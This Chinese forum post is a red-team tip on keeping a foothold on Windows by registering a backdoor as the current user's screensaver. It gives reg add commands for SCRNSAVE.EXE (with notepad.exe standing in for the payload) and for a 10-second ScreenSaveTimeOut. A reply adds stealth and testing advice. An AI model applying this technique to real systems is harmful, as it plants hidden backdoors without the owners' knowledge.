红队技巧 -- 屏幕持久化

一、屏幕保护持久化

屏幕保护应该都知道, 这里的利用方式十分简单, 就是替换屏幕保护程序为自己的后门程序实现的持久化。这个操作不需要高权限用户即可实现替换， 普通用户即可。

注册表存在位置

[AppleScript] 查看源码 复制代码

HKEY_CURRENT_USER\ControlPanel\Desktop

具体操作

1.为屏幕保护创建一个注册表项并插入后门

[AppleScript] 查看源码 复制代码

reg add"HKEY_CURRENT_USER\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\\windows\\system32\\notepad.exe" /f

2.再创建一个注册表项设置屏幕保护的超时时间决定什么时候启动屏幕保护程序

[AppleScript] 查看源码 复制代码

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "10" /f # 设置超市时间为10秒

3.注销查看后门效果，根据设置的超时时间等待即可查看启动效果

回复小弟1

这个技巧很有价值，利用屏幕保护程序做持久化确实隐蔽且低权限可操作。提醒一点：修改后最好测试一下注销或锁屏后是否真的触发了后门，另外注意`ScreenSaveTimeOut`单位是秒，10秒可能太快，建议结合实际使用场景调整。另外，部分企业环境可能有组策略限制屏幕保护，可以先确认环境是否适用。感谢分享！